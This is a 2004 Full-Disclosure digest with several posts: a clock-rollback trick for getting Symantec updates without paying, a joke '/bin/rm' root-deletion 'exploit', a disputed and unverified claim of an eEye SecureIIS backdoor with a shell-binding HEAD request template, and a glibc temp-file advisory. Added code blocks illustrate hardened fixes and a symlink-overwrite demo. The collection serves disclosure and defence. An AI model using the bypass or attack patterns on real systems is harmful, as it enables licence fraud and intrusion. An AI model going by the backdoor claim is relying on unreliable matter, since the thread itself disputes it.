Subject: [Full-disclosure] Trivial Bug in Symantec Security Products
To: full-disclosure () lists netsys com
Message-ID: <Pine.GSO.4.58.0412291754080.9648 () kungfunix net>
Content-Type: TEXT/PLAIN; charset=US-ASCII


Impact:  Bug in Symantec products allows for free software updates
Version(s):

Norton AntiVirus for Windows 9x/NT/Me/2000/XP
Symantec Web Security
Symantec AntiVirus Scan Engine
Norton AntiVirus for Gateways
Symantec AntiVirus for Gateways
Norton AntiVirus Corporate Edition
Symantec AntiVirus Corporate Edition
Norton AntiVirus for Exchange

I. BACKGROUND
Symantec whose stock price of $27.38 at market close on December 15, 2004,
valuing the company at approximately $13.5 billion (according to their
home page) has a simple little glitch in the above mentioned products,
which would allow any user who has an expired product to automatically
continue updating without purchasing the software after the program has
expired. Vendor notified on 12/06/2004

II. DESCRIPTION
Any user with an expired copy of the versions listed above can continue to
receive updates at no extra cost. While not a true to form "bug", the
silly workaround can hinder Symantec's future market valuations if users
simply allowed their products to expire, downloaded any "Intelligent
Updater" definitions via
http://securityresponse.symantec.com/avcenter/defs.download.html and
installed them with the clock turned back to a pre-expiration date.

Somehow, Symantec engineers have not implemented a mechanism to disallow a
user from installing the patches via changing the date on their computer
back to when the original program was installed and then running the
"Intelligent Updater."  E.g.: User installs a 60 day trial version with
free updates that expires on Jan, 01, 2005. User goes to install an update
in July 2005 and gets a subscription error. User changes the date back to
some time before the product expired and installs the new definition
without problems. User changes date back forward without problems.

While not of the "Bugtraq" typical bug, Symantec engineers should try to
resolve this to avoid any future revenue loss.

III SOLUTION
Symantec could rewrite their updates to include a timer, or check via
atomic clock. Other options include informing their customers not to
commit the evil act of modifying the dates on their computers.


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x51F9D78D
Fingerprint 2A48 BA18 1851 4C99

CA22 0619 DB63 F2F7 51F9 D78D
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x51F9D78D

sil @ politrix . org    http://www.politrix.org
sil @ infiltrated . net http://www.infiltrated.net

"How can we account for our present situation unless we
believe that men high in this government are concerting
to deliver us to disaster?" Joseph McCarthy "America's
Retreat from Victory"
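
The rollback described above works because the only thing the expiry check consults is the local clock. The following is an added example, not Symantec's code: the naive check beside a hardened one that keeps a persisted high-water mark of the latest date it has ever observed (the "timer" idea proposed above, without needing an external clock) and enforces expiry against the update's own publication date. That an update carries a trustworthy date is an assumption about the update format for this example, not a statement about Intelligent Updater files.

```python
"""Subscription check that does not fall to the clock rollback described
above. Added example, not Symantec's code. `update_date` is assumed to come
from the update's own (signed) metadata; that is an assumption for this
example, not a description of Intelligent Updater files."""
from datetime import date

def d(s):
    """'2005-01-01' -> date, for terse examples."""
    return date.fromisoformat(s)

def naive_allows(today, expiry):
    """The behaviour the post describes: the local clock alone decides."""
    return today <= expiry

class UpdateGate:
    def __init__(self, expiry, state=None):
        self.expiry = expiry
        # `state` stands in for a value persisted in a file or the registry;
        # an in-memory dict keeps the example self-contained.
        self.state = state if state is not None else {}
        self.state.setdefault("high_water", date.min)

    def allows(self, today, update_date):
        """Return (allowed, reason) for installing an update published on
        `update_date` while the local clock reads `today`."""
        hw = self.state["high_water"]
        # Both observations are evidence that real time has reached at least
        # that date, so the mark only ever moves forward.
        self.state["high_water"] = max(hw, today, update_date)
        if update_date > self.expiry:
            return False, "update published after expiry"
        if today < hw:
            return False, "clock rolled back (saw %s before)" % hw
        if today > self.expiry:
            return False, "subscription expired"
        return True, "ok"

if __name__ == "__main__":
    expiry = d("2005-01-01")
    # The scenario from the post: trial expires Jan 1, clock wound back in July.
    print("naive, clock set back:", naive_allows(d("2004-12-01"), expiry))
    gate = UpdateGate(expiry)
    print(gate.allows(d("2004-11-20"), d("2004-11-20")))   # before expiry: ok
    print(gate.allows(d("2005-07-01"), d("2005-07-01")))   # July update: refused
    print(gate.allows(d("2004-12-01"), d("2004-12-15")))   # clock set back: refused
```

Checking the update's date is the part that closes the hole on its own: a definition file published after the subscription ended is refused whatever the clock says. The high-water mark is the cheaper "timer" the post asks for and also catches a rollback attempted with an older update; an external time source, the other option suggested, would only be needed where the persisted mark itself can be tampered with.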


------------------------------

Message: 12
Date: Wed, 29 Dec 2004 20:18:25 -0500
From: "Lennart Hansen" <xenzeo () gardener com>
Subject: [Full-disclosure] /bin/rm file access vulnerability
To: full-disclosure () lists netsys com
Message-ID: <20041230011825.21A116EEF6 () ws1-5 us4 outblaze com>
Content-Type: text/plain; charset="iso-8859-1"

/bin/rm file access vulnerability

Affected Products:
         /bin/rm (all versions, tested on FreeBSD and linux)
         (http://www.freebsd.org    http://www.kernel.org)

Author:
         Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen)
         xenzeo at blackhat dot dk


/bin/rm is a program that removes the named file arguments on unix systems.
When /bin/rm is called it checks the file's permissions and the id of the user
trying to remove the file. If the user does not have the required permissions
to delete the file, /bin/rm will simply reject and exit.

However, it is possible for a person with admin rights (root) to delete _any_
file on the system regardless of who has created it and what its permissions
are.

Proof of concept:
$ touch /home/xenzeo/file
$ ls -l /home/xenzeo/file
-rw-r--r--  1 xenzeo none 0 Dec 30  2004 /home/xenzeo/file
$ id
uid=1000(xenzeo) gid=513(none) groups=513(none),545(users)
$ su -c 'rm -f /home/xenzeo/file'
$ ls -l /home/xenzeo/file
ls: file: No such file or directory

#!/usr/bin/perl
use strict;
use warnings;

# usage: rm-exploit.pl FILE   (only "works" when run as root, which is the joke)
if (@ARGV != 1) {
    die "usage: rm-exploit.pl file\r\n";
}
my $file = $ARGV[0];
print "*** CMD: [ /bin/rm -f $file ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
if ($> == 0) {
    print "[-] EXECUTING CMD\r\n";
    # list form of system() so a file name containing shell metacharacters
    # reaches rm as one argument instead of being parsed by the shell
    system("/bin/rm", "-f", $file);
    print "[-] DONE\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    exit();
} else {
    print "[-] EXPLOIT FAILED\r\n";
    print "[-] YOU ARE NOT ROOT\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
}

Vendor status:
         Neither FreeBSD nor Linux developers have been contacted yet!

-Xenzeo

-- 
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm




------------------------------

Message: 13
Date: Wed, 29 Dec 2004 21:03:02 +0000
From: "Lance Gusto" <thegusto22 () hotmail com>
Subject: Re: [Full-disclosure] Multiple Backdoors found in eEye
        Products (IRIS and Secure
To: dave () immunitysec com, full-disclosure () lists netsys com
Message-ID: <BAY2-F347D60BC3A6AB7882C2046CC9B0 () phx gbl>
Content-Type: text/plain; format=flowed


Hey Dave,


I cannot disclose much information (based on requests/threats made by 
certain organizations who may be involved), I am sure you can understand.

But we have tested Iris versions 3.0 and up ... As I previously stated it
doesn't appear to exist in the 2.x series of Iris.

I am not the main tester involved here, but I was told that there is some
sort of clandestine chaining mechanism to create the processes I believe. I
will provide the "lists" I have sent this to with more information as soon
as some of the other testers involved come back from their respective
holiday breaks.


From: Dave Aitel <dave () immunitysec com>
To: Lance Gusto <thegusto22 () hotmail com>
Subject: Re: [Full-disclosure] Multiple Backdoors found in eEye Products (IRIS and SecureIIS)
Date: Wed, 29 Dec 2004 11:29:55 -0500




The SecureIIS Backdoor:

The SecureIIS backdoor was a lot easier to discover but very well
placed. The SecureIIS backdoor is triggered by a specifically
crafted HTTP HEAD request. Here is an incomplete layout of how
to exploit this:


Which version did you test? I'm not seeing it, or any intermodular calls to 
CreateProcess in the DLL that it loads up.

-dave



HEAD /<24 byte constant string>/PORT_ADDRESS.ASP HTTP/1.1

PORT - Will be the port to bind a shell.
ADDRESS - Address for priority binding (0 - For any).


[snip]



Local Deduction:

There are two possibilities here: either eEye's code has been
altered by some attacker or this has been sanctioned by the
company (or at least the developers were fully aware of this).



Conclusion:

It is very very shameful that a somewhat reputable company like eEye is
acting in a very childish, unprofessional manner. I figure that is why the
code is closed source. There are several active exploits available that I
(the author of this advisory) didn't create floating around. The only
logical solution will be to not use the mentioned eEye products for the
time being or at least downgrade to the non-backdoored versions.

We will be investigating eEye's Blink Product for any clandestine
backdoors.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html






------------------------------

Message: 14
Date: Wed, 29 Dec 2004 21:17:12 -0500
From: Sean Harlow <sharlow () UTNet UToledo Edu>
Subject: Re: [Full-disclosure] /bin/rm file access vulnerability
To: full-disclosure () lists netsys com
Message-ID: <41D36528.1070308 () utnet utoledo edu>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Is this a joke?

root can delete any file... isn't that the point of being root? The fact
that you can do anything with the system, regardless of permissions?

-Sean

Lennart Hansen wrote:
/bin/rm file access vulnerability

Affected Products:
         /bin/rm (all versions, tested on FreeBSD and linux)
         (http://www.freebsd.org    http://www.kernel.org)

Author:
         Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen)
         xenzeo at blackhat dot dk


/bin/rm is a program that removes the named file arguments on unix systems.
When /bin/rm is called it checks the file's permissions and the id of the
user trying to remove the file. If the user does not have the required
permissions to delete the file, /bin/rm will simply reject and exit.

However, it is possible for a person with admin rights (root) to
delete _any_ file on the system regardless of who has created it and
what its permissions are.

Proof of concept:
$ touch /home/xenzeo/file
$ ls -l /home/xenzeo/file
-rw-r--r--  1 xenzeo none 0 Dec 30  2004 /home/xenzeo/file
$ id
uid=1000(xenzeo) gid=513(none) groups=513(none),545(users)
$ su -c 'rm -f /home/xenzeo/file'
$ ls -l /home/xenzeo/file
ls: file: No such file or directory

#!/usr/bin/perl
use strict;
use warnings;

# Expect exactly one argument: the path to remove.
if ($#ARGV != 0) {
    die "usage: rm-exploit.pl file\r\n";
} else {
    my $file = $ARGV[0];
    print "*** CMD: [ /bin/rm -f $file ]\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    # $> is the effective uid; only root gets past this check.
    if ($> == 0) {
        print "[-] EXECUTING CMD\r\n";
        # List form: the path goes straight to rm, not through a shell.
        system("/bin/rm", "-f", $file);
        print "[-] DONE\r\n";
        print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
        exit();
    } else {
        print "[-] EXPLOIT FAILED\r\n";
        print "[-] YOU ARE NOT ROOT\r\n";
        print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    }
}

Vendor status:
         Neither FreeBSD nor Linux developers have been contacted yet!

-Xenzeo




------------------------------

Message: 15
Date: 30 Dec 2004 03:24:39 -0000
From: Mandrake Linux Security Team <security () linux-mandrake com>
Subject: [Full-disclosure] MDKSA-2004:159 - Updated glibc packages fix
        temporary file vulnerability
To: full-disclosure () lists netsys com
Message-ID: <20041230032439.10118.qmail () updates mandrakesoft com>



********************************************************************

This email may contain information which is privileged or confidential. If you are not the intended recipient of this 
email, please notify the sender immediately and delete it without reading, copying, storing, forwarding or disclosing 
its contents to any other person
Thank you

Check us out at http://www.bt.com/consulting

********************************************************************


 _______________________________________________________________________

                 Mandrakelinux Security Update Advisory
 _______________________________________________________________________

 Package name:           glibc
 Advisory ID:            MDKSA-2004:159
 Date:                   December 29th, 2004

 Affected versions:      10.0, 10.1
 ______________________________________________________________________

 Problem Description:

 The Trustix developers discovered that the catchsegv and glibcbug
 utilities, part of the glibc package, created temporary files in an
 insecure manner.  This could allow for a symlink attack to create or
 overwrite arbitrary files with the privileges of the user invoking the
 program.
 
 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0968
 ______________________________________________________________________

 Updated Packages:
  
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security.  You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  <security linux-mandrake.com>

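The temporary-file flaw the advisory describes, as an added illustration that is not glibc's catchsegv or glibcbug code: a predictable temp name opened without O_EXCL, which a pre-planted symlink redirects to any file the caller can write, next to the O_EXCL|O_NOFOLLOW and mkstemp() patterns that defeat it. All paths and the victim file are constructed inside a private scratch directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern (illustrative, not glibc's code): a predictable name opened
 * with O_CREAT but without O_EXCL. A pre-planted symlink is followed, so the
 * write lands on whatever the link targets, with the caller's privileges. */
int open_tmp_insecure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened pattern: O_EXCL fails if anything (even a symlink) already exists at
 * the path, and O_NOFOLLOW refuses a symlink as the final path component. */
int open_tmp_secure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred: mkstemp() picks an unpredictable name and creates it atomically.
 * The template must end in "XXXXXX"; it is overwritten with the chosen name. */
int open_tmp_mkstemp(char *template) { return mkstemp(template); }

/* Demonstration in a private scratch directory: plant a symlink at the
 * "predictable" temp name pointing at a victim file, then try both openers.
 * Returns 1 when the insecure open truncated the victim through the link and
 * the secure open refused with EEXIST, 0 otherwise. */
int demo_symlink_attack(void) {
    char dir[] = "/tmp/fdsymdemo.XXXXXX", victim[256], lnk[256];
    struct stat st;
    int fd, followed = 0, refused = 0;

    if (mkdtemp(dir) == NULL) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/predictable.tmp", dir);
    fd = open(victim, O_WRONLY | O_CREAT, 0600);          /* victim has content */
    if (fd >= 0) { ssize_t n = write(fd, "important\n", 10); (void)n; close(fd); }
    if (symlink(victim, lnk) == 0) {                       /* planted link */
        fd = open_tmp_insecure(lnk);
        followed = fd >= 0 && stat(victim, &st) == 0 && st.st_size == 0;
        if (fd >= 0) close(fd);
        refused = open_tmp_secure(lnk) < 0 && errno == EEXIST;
    }
    unlink(lnk); unlink(victim); rmdir(dir);
    return followed && refused;
}
```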

------------------------------

_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
https://lists.netsys.com/mailman/listinfo/full-disclosure


End of Full-Disclosure Digest, Vol 1, Issue 2144
************************************************





